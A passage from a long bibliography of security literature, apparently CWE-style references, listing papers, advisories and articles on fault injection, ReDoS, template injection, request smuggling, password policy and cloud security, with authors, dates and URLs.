Rigaud, J. Danger + Precise Spatio-Temporal Electromagnetic Fault Injections on Data Transfers + 2019 + https://hal.telecom-paris.fr/hal-02338456/document + + + Colin O'Flynn + BAM BAM!! On Reliability of EMFI for in-situ Automotive ECU Attacks + https://eprint.iacr.org/2020/937.pdf + + + J. Balasch, D. Arumí, S. Manich + Design and Validation of a Platform for Electromagnetic Fault Injection + https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=8311630 + + + M. Gay, B. Karp, O. Keren, I. Polian + Error control scheme for malicious and natural faults in cryptographic modules + 2019 + https://link.springer.com/content/pdf/10.1007/s13389-020-00234-7.pdf + 2023-04-07 + + + M. L. Akkar, L. Goubin, O. Ly + Automatic Integration of Counter-Measures Against Fault Injection Attacks + https://www.labri.fr/perso/ly/publications/cfed.pdf + + + Olivier Arteau + Prototype pollution attack in NodeJS application + 2018 + --05 + ---15 + https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf + + + Changhui Xu + What is Prototype Pollution? + 2019 + --07 + ---30 + https://codeburst.io/what-is-prototype-pollution-49482fc4b638 + + + Jerry Backer + David Hely + Ramesh Karri + Secure design-for-debug for Systems-on-Chip + 2015 + --10 + ---06 + https://ieeexplore.ieee.org/document/7342418 + + + Jerry Backer + David Hely + Ramesh Karri + Secure and Flexible Trace-Based Debugging of Systems-on-Chip + 2016 + --12 + https://dl.acm.org/doi/pdf/10.1145/2994601 + 2023-04-07 + + + Trusted Computing Group + TCG Roots of Trust Specification + 2018 + --07 + https://trustedcomputinggroup.org/wp-content/uploads/TCG_Roots_of_Trust_Specification_v0p20_PUBLIC_REVIEW.pdf + + + GlobalPlatform Security Task Force + Root of Trust Definitions and Requirements + 2017 + --03 + https://globalplatform.org/wp-content/uploads/2018/06/GP_RoT_Definitions_and_Requirements_v1.0.1_PublicRelease_CC.pdf + + + National Institute of Standards and Technology + NIST Special Publication 800-88 Revision 1: Guidelines for Media Sanitization + 2014 + --12 + https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-88r1.pdf + 2023-04-07 + + + Hassan M. G. Wassel, Ying Gao, Jason K. Oberg, Tedd Huffmire, Ryan Kastner, Frederic T. Chong, Timothy Sherwood + SurfNoC: A Low Latency and Provably Non-Interfering Approach to Secure Networks-On-Chip + 2013 + http://cseweb.ucsd.edu/~kastner/papers/isca13-surfNOC.pdf + + + Leonid Grustniy + Loapi--This Trojan is hot! + 2017 + --12 + https://www.kaspersky.com/blog/loapi-trojan/20510/ + + + Consortium for Information & Software Quality (CISQ) + AUTOMATED SOURCE CODE MEASURE FOR DATA PROTECTION + 2020 + https://www.it-cisq.org/automated-source-code-measure-data-protection/index.htm + + + Akond Rahman + Md Rayhanur Rahman + Chris Parnin + Laurie Williams + Security Smells in Ansible and Chef Scripts: A Replication Study + 2020 + --06 + ---20 + https://arxiv.org/pdf/1907.07159.pdf + + + Akond Rahman + Chris Parnin + Laurie Williams + The Seven Sins: Security Smells in Infrastructure as Code Scripts + ICSE '19: Proceedings of the 41st International Conference on Software Engineering + 2019 + --05 + https://dl.acm.org/doi/10.1109/ICSE.2019.00033 + 2023-04-07 + + + Josep Balasch + Benedikt Gierlichs + Ingrid Verbauwhede + An In-depth and Black-box Characterization of the Effects of Clock Glitches on 8-bit MCUs + 2011 Workshop on Fault Diagnosis and Tolerance in Cryptography (IEEE) + 2011 + --09 + https://ieeexplore.ieee.org/document/6076473 + + + Jan Goyvaerts + Runaway Regular Expressions: Catastrophic Backtracking + 2019 + --12 + ---22 + https://www.regular-expressions.info/catastrophic.html + + + Adar Weidman + Regular expression Denial of Service - ReDoS + https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS + + + Ilya Kantor + Catastrophic backtracking + 2020 + --12 + ---13 + https://javascript.info/regexp-catastrophic-backtracking + + + Cristian-Alexandru Staicu + Michael Pradel + Freezing the Web: A Study of ReDoS Vulnerabilities in JavaScript-based Web Servers + USENIX Security Symposium + 2018 + --07 + ---11 + https://www.usenix.org/system/files/conference/usenixsecurity18/sec18-staicu.pdf + + + James C. Davis + Christy A. Coghlan + Francisco Servant + Dongyoon Lee + The Impact of Regular Expression Denial of Service (ReDoS) in Practice: An Empirical Study at the Ecosystem Scale + 2018 + --08 + ---01 + https://fservant.github.io/papers/Davis_Coghlan_Servant_Lee_ESECFSE18.pdf + 2023-04-07 + + + James Davis + The Regular Expression Denial of Service (ReDoS) cheat-sheet + 2020 + --05 + ---23 + https://levelup.gitconnected.com/the-regular-expression-denial-of-service-redos-cheat-sheet-a78d0ed7d865 + + + Catalin Cimpanu + Microsoft warns enterprises of new 'dependency confusion' attack technique + ZDNet + 2021 + --02 + ---10 + https://www.zdnet.com/article/microsoft-warns-enterprises-of-new-dependency-confusion-attack-technique/ + + + Alex Birsan + Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies + 2021 + --02 + ---09 + https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610 + + + Microsoft + 3 Ways to Mitigate Risk When Using Private Package Feeds + 2021 + --02 + ---09 + https://azure.microsoft.com/mediahandler/files/resourcefiles/3-ways-to-mitigate-risk-using-private-package-feeds/3%20Ways%20to%20Mitigate%20Risk%20When%20Using%20Private%20Package%20Feeds%20-%20v1.0.pdf + + + Matthew Green + Why IND-CPA implies randomized encryption + 2018 + --08 + ---24 + https://blog.cryptographyengineering.com/why-ind-cpa-implies-randomized-encryption/ + + + NIST + Recommendation for Block Cipher Modes of Operation + 2001 + --12 + https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-38a.pdf + 2023-04-07 + + + Wikipedia + Block cipher mode of operation + 2021 + --03 + ---03 + https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation + + + Wikipedia + File:Tux ecb.jpg + 2006 + --05 + ---20 + https://commons.wikimedia.org/wiki/File:Tux_ecb.jpg + + + Nikita Borisov + Ian Goldberg + David Wagner + Intercepting Mobile Communications: The Insecurity of 802.11 + Proceedings of the Seventh Annual International Conference on Mobile Computing And Networking + 2001 + --07 + ACM + http://www.isaac.cs.berkeley.edu/isaac/mobicom.pdf + + + Wikipedia + Birthday problem + 2021 + --03 + ---06 + https://en.wikipedia.org/wiki/Birthday_problem + + + Wikipedia + Initialization Vector + 2021 + --03 + ---08 + https://en.wikipedia.org/wiki/Initialization_vector + + + NIST + Recommendation for Block Cipher Modes of Operation: Galois/Counter Mode (GCM) and GMAC + 2007 + --11 + https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-38d.pdf + 2023-04-07 + + + Arxum Path Security + CBC Mode is Malleable. Don't trust it for Authentication + 2019 + --10 + ---16 + https://arxumpathsecurity.com/blog/2019/10/16/cbc-mode-is-malleable-dont-trust-it-for-authentication + 2023-04-07 + + + Scott A. Crosby + Regular Expression Denial of Service + 2003 + --08 + https://web.archive.org/web/20031120114522/http://www.cs.rice.edu/~scrosby/hash/slides/USENIX-RegexpWIP.2.ppt + + + Nikolaos Athanasios Anagnostopoulos + Tolga Arul + Markus Rosenstihl + André Schaller + Sebastian Gabmeyer + Stefan Katzenbeisser + Low-Temperature Data Remnanence Attacks Against Intrinsic SRAM PUFs + 2018 + --10 + ---15 + https://ieeexplore.ieee.org/abstract/document/8491873/ + + + Yuan Cao + Yunyi Guo + Benyu Liu + Wei Ge + Min Zhu + Chip-Hong Chang + A Fully Digital Physical Unclonable Function Based Temperature Sensor for Secure Remote Sensing + 2018 + --10 + ---11 + https://ieeexplore.ieee.org/abstract/document/8487347/ + + + Urbi Chatterjee + Soumi Chatterjee + Debdeep Mukhopadhyay + Rajat Subhra Chakraborty + Machine Learning Assisted PUF Calibration for Trustworthy Proof of Sensor Data in IoT + 2020 + --06 + https://dl.acm.org/doi/abs/10.1145/3393628 + 2023-04-07 + + + Wikipedia + Power Analysis + https://en.wikipedia.org/wiki/Power_analysis + + + 2021 CWE Top 25 Most Dangerous Software Weaknesses + 2021 + --07 + ---20 + http://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html + + + Is COBOL holding you hostage with Math? + 2018 + --07 + ---28 + https://medium.com/the-technical-archaeologist/is-cobol-holding-you-hostage-with-math-5498c0eb428b + + + Intermediate results and arithmetic precision + 2021 + --06 + ---30 + https://www.ibm.com/docs/en/cobol-zos/6.2?topic=appendixes-intermediate-results-arithmetic-precision + + + 8.1.2. Arbitrary Precision Numbers + 2021 + --06 + ---24 + https://www.postgresql.org/docs/8.3/datatype-numeric.html#DATATYPE-NUMERIC-DECIMAL + + + Muller's Recurrence + 2017 + --11 + ---11 + https://scipython.com/blog/mullers-recurrence/ + + + An Improvement To Floating Point Numbers + 2015 + --10 + ---22 + https://hackaday.com/2015/10/22/an-improvement-to-floating-point-numbers/ + + + HIGH PERFORMANCE COMPUTING: ARE WE JUST GETTING WRONG ANSWERS FASTER? + 1999 + --06 + ---23 + https://www3.nd.edu/~markst/cast-award-speech.pdf + + + Information Technology Laboratory, National Institute of Standards and Technology + FIPS PUB 140-3: SECURITY REQUIREMENTS FOR CRYPTOGRAPHIC MODULES + 2019 + --03 + ---22 + https://csrc.nist.gov/publications/detail/fips/140/3/final + + + James Kettle + Server-Side Template Injection + 2015 + --08 + ---05 + https://portswigger.net/research/server-side-template-injection + 2023-04-07 + + + James Kettle + Server-Side Template Injection: RCE For The Modern Web App + 2015 + --12 + ---27 + https://www.youtube.com/watch?v=3cT0uE7Y87s + + + Philippe Arteau + Template Injection in Action! + 2020 + --11 + https://gosecure.github.io/template-injection-workshop/#0 + + + Pravinrp + Server Side Template Injection + 2019 + --07 + ---30 + https://medium.com/server-side-template-injection/server-side-template-injection-faf88d0c7f34 + + + Health Care Industry Cybersecurity Task Force + Report on Improving Cybersecurity in the + Health Care Industry + 2017 + --06 + https://www.phe.gov/Preparedness/planning/CyberTF/Documents/report2017.pdf + + + close - Perldoc Browser + https://perldoc.perl.org/functions/close + + + io - Core tools for working with streams — Python 3.9.7 documentation + 2021 + --09 + ---02 + https://docs.python.org/3.9/library/io.html#io.IOBase.close + + + FileOutputStream (Java Platform SE 7 ) + 2020 + https://docs.oracle.com/javase/7/docs/api/java/io/FileOutputStream.html + + + FileOutputStream (Java SE 11 & JDK 11 ) + 2021 + https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/io/FileOutputStream.html + + + Jo Van Bulck, Daniel Moghimi, Michael Schwarz, Moritz Lipp, Marina Minkin, Daniel Genkin, Yuval Yarom, Berk Sunar, Daniel Gruss, and Frank Piessens + LVI - Hijacking Transient Execution with Load Value Injection + 2020 + https://lviattack.eu/ + + + Jo Van Bulck, Daniel Moghimi, Michael Schwarz, Moritz Lipp, Marina Minkin, Daniel Genkin, Yuval Yarom, Berk Sunar, Daniel Gruss, and Frank Piessens + LVI: Hijacking Transient Execution through Microarchitectural Load Value Injection + 2020 + --01 + ---09 + https://lviattack.eu/lvi.pdf + + + Hijacking Transient Execution through Microarchitectural Load Value Injection + 2020 + --05 + ---18 + https://www.youtube.com/watch?v=99kVz-YGi6Y + + + Stephan van Schaik, Marina Minkin, Andrew Kwong, Daniel Genkin, Yuval Yarom + CacheOut: Leaking Data on Intel CPUs via Cache Evictions + 2020 + --12 + ---28 + https://cacheoutattack.com/files/CacheOut.pdf + + + OWASP Top 10:2021 + 2021 + --09 + ---24 + OWASP + https://owasp.org/Top10/ + + + A01:2021 - Broken Access Control + 2021 + --09 + ---24 + OWASP + https://owasp.org/Top10/A01_2021-Broken_Access_Control/ + + + A02:2021 - Cryptographic Failures + 2021 + --09 + ---24 + OWASP + https://owasp.org/Top10/A02_2021-Cryptographic_Failures/ + + + A03:2021 - Injection + 2021 + --09 + ---24 + OWASP + https://owasp.org/Top10/A03_2021-Injection/ + + + A04:2021 - Insecure Design + 2021 + --09 + ---24 + OWASP + https://owasp.org/Top10/A04_2021-Insecure_Design/ + + + A05:2021 - Security Misconfiguration + 2021 + --09 + ---24 + OWASP + https://owasp.org/Top10/A05_2021-Security_Misconfiguration/ + + + A06:2021 - Vulnerable and Outdated Components + 2021 + --09 + ---24 + OWASP + https://owasp.org/Top10/A06_2021-Vulnerable_and_Outdated_Components/ + + + A07:2021 - Identification and Authentication Failures + 2021 + --09 + ---24 + OWASP + https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/ + + + A08:2021 - Software and Data Integrity Failures + 2021 + --09 + ---24 + OWASP + https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures/ + + + A09:2021 - Security Logging and Monitoring Failures + 2021 + --09 + ---24 + OWASP + https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/ + + + A10:2021 - Server-Side Request Forgery (SSRF) + 2021 + --09 + ---24 + OWASP + https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/ + + + Ross Anderson + Security Engineering + 2001 + https://www.cl.cam.ac.uk/~rja14/musicfiles/manuscripts/SEv1.pdf + + + Graham Cluley + This Black Box Can Brute Force Crack iPhone PIN Passcodes + The Mac Security Blog + 2015 + --03 + ---16 + https://www.intego.com/mac-security-blog/iphone-pin-pass-code/ + + + Monodeep Kar + Arvind Singh + Santosh Ghosh + Sanu Mathew + Anand Rajan + Vivek De + Raheem Beyah + Saibal Mukhopadhyay + Blindsight: Blinding EM Side-Channel Leakage using Built-In Fully Integrated Inductive Voltage Regulator + 2018 + --02 + https://arxiv.org/pdf/1802.09096.pdf + 2023-04-07 + + + Zhenyu Ning + Fengwei Zhang + Understanding the Security of ARM Debugging Features + 2019 IEEE Symposium on Security and Privacy (SP) + 2019 + --05 + ---22 + https://www.computer.org/csdl/proceedings-article/sp/2019/666000b156/19skgcwSgsE + 2023-04-07 + + + Victor Lomne + Thomas Roche + A Side Journey to Titan + 2021 + --01 + ---07 + https://web.archive.org/web/20210107182441/https://ninjalab.io/wp-content/uploads/2021/01/a_side_journey_to_titan.pdf + 2023-04-07 + + + Alexandre Menu + Jean-Max Dutertre + Olivier Potin + Jean-Baptiste Rigaud + Experimental Analysis of the Electromagnetic Instruction Skip Fault Model + IEEE Xplore + 2020 + --04 + ---30 + https://ieeexplore.ieee.org/document/9081261 + + + Niek Timmers + Albert Spruyt + Marc Witteman + Controlling PC on ARM using Fault Injection + 2016 + --06 + ---11 + https://fdtc.deib.polimi.it/FDTC16/shared/FDTC-2016-session_2_1.pdf + 2023-04-07 + + + Colin O'Flynn + Attacking USB Gear with EMFI + Circuit Cellar + 2019 + --05 + https://www.totalphase.com/media/pdf/whitepapers/Circuit_Cellar_TP.pdf + + + Project Zero + Exploiting the DRAM rowhammer bug to gain kernel privileges + 2015 + --03 + ---09 + https://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html + + + Information Technology Laboratory, National Institute of Standards and Technology + FIPS PUB 140-2: SECURITY REQUIREMENTS FOR CRYPTOGRAPHIC MODULES + 2001 + --05 + ---25 + https://csrc.nist.gov/publications/detail/fips/140/2/final + + + Wikipedia + Cryptographic primitive + https://en.wikipedia.org/wiki/Cryptographic_primitive + + + Gilbert Goodwill + Benjamin Jun + Josh Jaffe + Pankaj Rohatgi + A testing methodology for side-channel resistance validation + 2011 + https://csrc.nist.gov/csrc/media/events/non-invasive-attack-testing-workshop/documents/08_goodwill.pdf + + + ISO/IEC + ISO/IEC 17825:2016: Testing methods for the mitigation of non-invasive attack classes against cryptographic modules + 2016 + https://www.iso.org/standard/60612.html + + + Cryptography Research Inc. + Test Vector Leakage Assessment (TVLA) Derived Test Requirements (DTR) with AES + 2015 + --08 + https://www.rambus.com/wp-content/uploads/2015/08/TVLA-DTR-with-AES.pdf + + + Danilo Šijaˇci´ + Josep Balasch + Bohan Yang + Santosh Ghosh + Ingrid Verbauwhede + Towards efficient and automated side-channel evaluations at design time + Journal of Cryptographic Engineering, 10(4) + 2020 + https://www.esat.kuleuven.be/cosic/publications/article-3204.pdf + + + Amit Kumar + Cody Scarborough + Ali Yilmaz + Michael Orshansky + Efficient simulation of EM side-channel attack resilience + IEEE/ACM International Conference on Computer-Aided Design (ICCAD) + 2017 + https://dl.acm.org/doi/pdf/10.5555/3199700.3199717 + 2023-04-07 + + + Yuan Yao + Tuna Tufan + Tarun Kathuria + Baris Ege + Ulkuhan Guler + Patrick Schaumont + Pre-silicon Architecture Correlation Analysis (PACA): Identifying and Mitigating the Source of Side-channel Leakage at Gate-level + 2021 + --04 + ---21 + IACR Cryptology ePrint Archive + https://eprint.iacr.org/2021/530.pdf + + + Elisabeth Oswald + Thomas Popp + Stefan Mangard + Power Analysis Attacks - Revealing the Secrets of Smart Cards + 2007 + https://link.springer.com/book/10.1007/978-0-387-38162-6 + 2023-04-07 + + + David Oswald + Bastian Richter + Christof Paar + Side-Channel Attacks on the Yubikey 2 One-Time Password Generator + 2013 + --06 + ---14 + https://www.emsec.ruhr-uni-bochum.de/media/crypto/veroeffentlichungen/2014/02/04/paper_yubikey_sca.pdf + + + NIST + CAVP Testing: Individual Component Testing + https://csrc.nist.gov/projects/cryptographic-algorithm-validation-program/component-testing + + + CERT Coordination Center + Intel BIOS locking mechanism contains race condition that enables write protection bypass + 2015 + --01 + ---05 + https://www.kb.cert.org/vuls/id/766164/ + + + MITRE + 2021 CWE Most Important Hardware Weaknesses + 2021 + --10 + ---28 + https://cwe.mitre.org/scoring/lists/2021_CWE_MiHW.html + + + François-Xavier Standaert + How (not) to Use Welch's T-test in Side-Channel Security Evaluations + 2017 + --02 + ---15 + IACR Cryptology ePrint Archive + https://eprint.iacr.org/2017/138.pdf + + + Carolyn Whitnall + Elisabeth Oswald + A Critical Analysis of ISO 17825 ('Testing methods for the mitigation of non-invasive attack classes against cryptographic modules') + 2019 + --09 + ---10 + IACR Cryptology ePrint Archive + https://eprint.iacr.org/2019/1013.pdf + + + Wikipedia + Network on a chip + https://en.wikipedia.org/wiki/Network_on_a_chip + 2021-10-24 + + + Subodha Charles + Prabhat Mishra + A Survey of Network-on-Chip Security Attacks and Countermeasures + ACM Computing Surveys + 2021 + --05 + https://dl.acm.org/doi/fullHtml/10.1145/3450964 + 2023-04-07 + + + Bruce Schneier + Cryptanalysis of SHA-1 + 2005 + --02 + ---18 + https://www.schneier.com/blog/archives/2005/02/cryptanalysis_o.html + 2021-10-25 + + + Dan Goodin + At death's door for years, widely used SHA1 function is now dead + 2017 + --02 + ---23 + Ars Technica + https://arstechnica.com/information-technology/2017/02/at-deaths-door-for-years-widely-used-sha1-function-is-now-dead/ + 2021-10-25 + + + Subodha Charles + Design of Secure and Trustworthy Network-on-chip Architectures + 2020 + https://www.cise.ufl.edu/research/cad/Publications/charlesThesis.pdf + + + National Telecommunications and Information Administration + SOFTWARE BILL OF MATERIALS + https://ntia.gov/page/software-bill-materials + 2023-04-07 + + + NTIA Multistakeholder Process on Software Component Transparency Framing Working Group + Framing Software Component Transparency: Establishing a Common Software Bill of Materials (SBOM) + 2021 + --10 + ---21 + https://www.ntia.gov/files/ntia/publications/ntia_sbom_framing_2nd_edition_20211021.pdf + + + Securing Energy Infrastructure Executive Task Force (SEI ETF) + Categories of Security Vulnerabilities in ICS + 2022 + --03 + ---09 + https://inl.gov/wp-content/uploads/2022/03/SEI-ETF-NCSV-TPT-Categories-of-Security-Vulnerabilities-ICS-v1_03-09-22.pdf + + + Dawid Golunski + PHPMailer < 5.2.18 Remote Code Execution [CVE-2016-10033] + 2016 + --12 + ---25 + https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html + + + Dawid Golunski + Pwning PHP mail() function For Fun And RCE + 2017 + --05 + ---03 + https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html + + + Drew Branch + WebSockets not Bound by SOP and CORS? Does this mean... + 2018 + --06 + ---06 + https://blog.securityevaluators.com/websockets-not-bound-by-cors-does-this-mean-2e7819374acc + + + Mehul Mohan + How to secure your WebSocket connections + 2018 + --11 + ---12 + https://www.freecodecamp.org/news/how-to-secure-your-websocket-connections-d0be0996c556/ + + + PortSwigger + Testing for WebSockets security vulnerabilities + https://portswigger.net/web-security/websockets + 2023-04-07 + + + FDA + Cybersecurity in Medical Devices: Quality System Considerations and Content of Premarket Submissions Draft Guidance for Industry and Food and Drug Administration Staff (DRAFT GUIDANCE) + 2022 + --04 + ---08 + https://www.fda.gov/media/119933/download + + + Sergei P. Skorobogatov + Semi-invasive attacks - A new approach to hardware security analysis + 2005 + --04 + https://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-630.pdf + + + Vickie Li + Cross-Site WebSocket Hijacking (CSWSH) + 2019 + --11 + ---27 + https://medium.com/swlh/hacking-websocket-25d3cba6a4b9 + + + Christian Schneider + Cross-Site WebSocket Hijacking (CSWSH) + 2013 + --09 + ---01 + https://christian-schneider.net/CrossSiteWebSocketHijacking.html + + + Wikipedia + Random early detection + https://en.wikipedia.org/wiki/Random_early_detection + + + Wikipedia + Transport Layer Security + https://en.wikipedia.org/wiki/Transport_Layer_Security + + + Thu T. Pham + The Great DNS Vulnerability of 2008 by Dan Kaminsky + 2016 + --04 + ---26 + https://duo.com/blog/the-great-dns-vulnerability-of-2008-by-dan-kaminsky + + + Sam Weber + Paul A. Karger + Amit Paradkar + A Software Flaw Taxonomy: Aiming Tools At Security + 2005 + https://cwe.mitre.org/documents/sources/ASoftwareFlawTaxonomy-AimingToolsatSecurity%5BWeber,Karger,Paradkar%5D.pdf + + + Eran Shimony + Follow the Link: Exploiting Symbolic Links with Ease + 2019 + --10 + ---03 + https://www.cyberark.com/resources/threat-research-blog/follow-the-link-exploiting-symbolic-links-with-ease + + + James Forshaw + A Link to the Past - Abusing Symbolic Links on Windows + https://www.youtube.com/watch?v=0KO3oGXtMNo + + + James Forshaw + Windows 10^H^H Symbolic Link Mitigations + 2015 + --08 + ---25 + https://googleprojectzero.blogspot.com/2015/08/windows-10hh-symbolic-link-mitigations.html + + + Symbolic testing tools + https://github.com/googleprojectzero/symboliclink-testing-tools + + + Shubham Dubey + Understanding and Exploiting Symbolic links in Windows - Symlink Attack EOP + 2020 + --04 + ---16 + https://nixhacker.com/understanding-and-exploiting-symbolic-link-in-windows/ + + + Simon Zuckerbraun + Abusing Arbitrary File Deletes to Escalate Privilege and Other Great Tricks + 2022 + --03 + ---17 + https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks + + + 2022 CWE Top 25 Most Dangerous Software Weaknesses + 2022 + --06 + ---28 + http://cwe.mitre.org/top25/archive/2022/2022_cwe_top25.html + + + Clément Lavoillotte + Abusing privileged file operations + 2019 + --03 + ---20 + https://troopers.de/troopers19/agenda/7af9hw/ + + + Robert Auger + HTTP Request Splitting + 2011 + --02 + ---01 + http://projects.webappsec.org/w/page/13246929/HTTP%20Request%20Splitting + + + Robert Auger + HTTP Response Smuggling + 2011 + --02 + ---01 + http://projects.webappsec.org/w/page/13246930/HTTP%20Response%20Smuggling + + + Dzevad Alibegovic + HTTP Request Smuggling: Complete Guide to Attack Types and Prevention + 2021 + --08 + ---23 + https://brightsec.com/blog/http-request-smuggling-hrs/ + + + Busra Demir + A Pentester's Guide to HTTP Request Smuggling + 2020 + --10 + ---15 + https://www.cobalt.io/blog/a-pentesters-guide-to-http-request-smuggling + + + Edi Kogan + Daniel Kerman + HTTP Desync Attacks in the Wild and How to Defend Against Them + 2019 + --10 + ---29 + https://www.imperva.com/blog/http-desync-attacks-and-defence-methods/ + + + James Kettle + HTTP Desync Attacks: Request Smuggling Reborn + 2019 + --08 + ---07 + https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn + 2023-04-07 + + + PortSwigger + HTTP request smuggling + https://portswigger.net/web-security/request-smuggling + 2023-04-07 + + + CWE/CAPEC + Neutralizing Your Inputs: A Log4Shell Weakness Story + https://medium.com/@CWE_CAPEC/neutralizing-your-inputs-a-log4shell-weakness-story-89954c8b25c9 + + + OWASP + Expression Language Injection + https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection + + + Douglas N. Arnold + The sinking of the Sleipner A offshore platform + https://www-users.cse.umn.edu/~arnold/disasters/sleipner.html + + + Snyk + Zip Slip Vulnerability + 2018 + --06 + ---05 + https://security.snyk.io/research/zip-slip-vulnerability + + + Forescout Vedere Labs + OT:ICEFALL: The legacy of "insecure by design" and its implications for certifications and risk management + 2022 + --06 + ---20 + https://www.forescout.com/resources/ot-icefall-report/ + + + Sick Codes + Universal "netmask" npm package, used by 270,000+ projects, vulnerable to octal input data + 2021 + --03 + ---28 + https://sick.codes/universal-netmask-npm-package-used-by-270000-projects-vulnerable-to-octal-input-data-server-side-request-forgery-remote-file-inclusion-local-file-inclusion-and-more-cve-2021-28918/ + + + Texas Instruments + Physical Security Attacks Against Silicon Devices + 2022 + --01 + ---31 + https://www.ti.com/lit/an/swra739/swra739.pdf?ts=1644234570420 + + + Lennert Wouters + Benedikt Gierlichs + Bart Preneel + On The Susceptibility of Texas Instruments SimpleLink Platform Microcontrollers to Non-Invasive Physical Attacks + 2022 + --03 + ---14 + https://eprint.iacr.org/2022/328.pdf + + + MITRE + Supplemental Details - 2022 CWE Top 25 + 2022 + --06 + ---28 + https://cwe.mitre.org/top25/archive/2022/2022_cwe_top25_supplemental.html#problematicMappingDetails + + + Julia Lokrantz + Ethical hacking of a Smart Automatic Feed Dispenser + 2021 + --06 + ---07 + http://kth.diva-portal.org/smash/get/diva2:1561552/FULLTEXT01.pdf + + + Lance Spitzner + Time for Password Expiration to Die + 2021 + --06 + ---27 + https://www.sans.org/blog/time-for-password-expiration-to-die/ + + + Lorrie Cranor + Time to rethink mandatory password changes + 2016 + --03 + ---02 + https://www.ftc.gov/policy/advocacy-research/tech-at-ftc/2016/03/time-rethink-mandatory-password-changes + + + Eugene Spafford + Security Myths and Passwords + 2006 + --04 + ---19 + https://www.cerias.purdue.edu/site/blog/post/password-change-myths/ + + + National Cyber Security Centre + Password administration for system owners + 2018 + --11 + ---19 + https://www.ncsc.gov.uk/collection/passwords + 2023-04-07 + + + NIST + Digital Identity Guidelines: Authentication and Lifecycle Management(SP 800-63B) + 2017 + --06 + https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63b.pdf + 2023-04-07 + + + National Cyber Security Centre + Let them paste passwords + 2017 + --01 + ---02 + https://www.ncsc.gov.uk/blog-post/let-them-paste-passwords + 2023-04-07 + + + WizCase + Over 80 US Municipalities' Sensitive Information, Including Resident's Personal Data, Left Vulnerable in Massive Data Breach + 2021 + --07 + ---20 + https://www.wizcase.com/blog/us-municipality-breach-report/ + + + Jonathan Greig + 1,000 GB of local government data exposed by Massachusetts software company + 2021 + --07 + ---22 + https://www.zdnet.com/article/1000-gb-of-local-government-data-exposed-by-massachusetts-software-company/ + + + Amazon + AWS Foundational Security Best Practices controls + 2022 + https://docs.aws.amazon.com/securityhub/latest/userguide/securityhub-controls-reference.html + 2023-04-07 + + + Microsoft + Authentication and authorization in Azure App Service and Azure Functions + 2021 + --11 + ---23 + https://learn.microsoft.com/en-us/azure/app-service/overview-authentication-authorization + 2022-10-11 + + + Microsoft + Azure encryption overview + 2022 + --08 + ---18 + https://learn.microsoft.com/en-us/azure/security/fundamentals/encryption-overview + 2022-10-11 + + + Microsoft + The Developer's Guide to Azure + 2021 + https://azure.microsoft.com/en-us/resources/whitepapers/developer-guide-to-azure/ + 2022-10-11 + + + Google Cloud + Default encryption at rest + 2022 + --10 + ---11 + https://cloud.google.com/docs/security/encryption/default-encryption + 2022-10-11 + + + Google Cloud + Authentication and authorization use cases + 2022 + --10 + ---11 + https://cloud.google.com/docs/authentication/use-cases + 2022-10-11 + + + Kelly Jackson Higgins + Researchers Out Default Passwords Packaged With ICS/SCADA Wares + 2016 + --01 + ---04 + https://www.darkreading.com/endpoint/researchers-out-default-passwords-packaged-with-ics-scada-wares + 2022-10-11 + + + ICS-CERT + ICS Alert (ICS-ALERT-13-164-01): Medical Devices Hard-Coded Passwords + 2013 + --06 + ---13 + https://www.cisa.gov/news-events/ics-alerts/ics-alert-13-164-01 + 2023-04-07 + + + Kurt Seifried and other members of the CWE-Research mailing list + Discussion Thread: Time to retire CWE-262 and CWE-263 + 2021 + --12 + ---03 + https://www.mail-archive.com/cwe-research-list@mitre.org/msg00018.html + 2022-10-11 + + + Microsoft + Remediate anonymous public read access to blob data (Azure Resource Manager deployments) + 2022 + --12 + ---09 + https://learn.microsoft.com/en-us/azure/storage/blobs/anonymous-read-access-prevent + 2023-01-19 + + + Center for Internet Security + CIS Microsoft Azure Foundations Benchmark version 1.5.0 + 2022 + --08 + ---16 + https://www.cisecurity.org/benchmark/azure + 2023-01-19 + + + Microsoft + Enable and manage Azure Storage Analytics logs (classic) + 2023 + --01 + ---23 + https://learn.microsoft.com/en-us/azure/storage/common/manage-storage-analytics-logs + 2023-01-24 + + + Microsoft + Require secure transfer to ensure secure connections + 2022 + --07 + ---24 + https://learn.microsoft.com/en-us/azure/storage/common/storage-require-secure-transfer + 2023-01-24 + + + Microsoft + Enable infrastructure encryption for double encryption of data + 2022 + --07 + ---14 + https://learn.microsoft.com/en-us/azure/storage/common/infrastructure-encryption-enable + 2023-01-24 + + + Amélie Koran, Wendy Nather, Stewart Scott, Sara Ann Brackett + The Cases for Using the SBOMs We Build + 2022 + --11 + https://www.atlanticcouncil.org/wp-content/uploads/2022/11/AC_SBOM_IB_v2-002.pdf + 2023-01-25 + + + OWASP + OWASP Dependency-Check + https://owasp.org/www-project-dependency-check/ + 2023-01-25 + + + Jeff Williams, Arshan Dabirsiaghi + The Unfortunate Reality of Insecure Libraries + 2014 + https://owasp.org/www-project-dependency-check/ + 2023-01-25 + + + ICS-CERT + ICS Alert 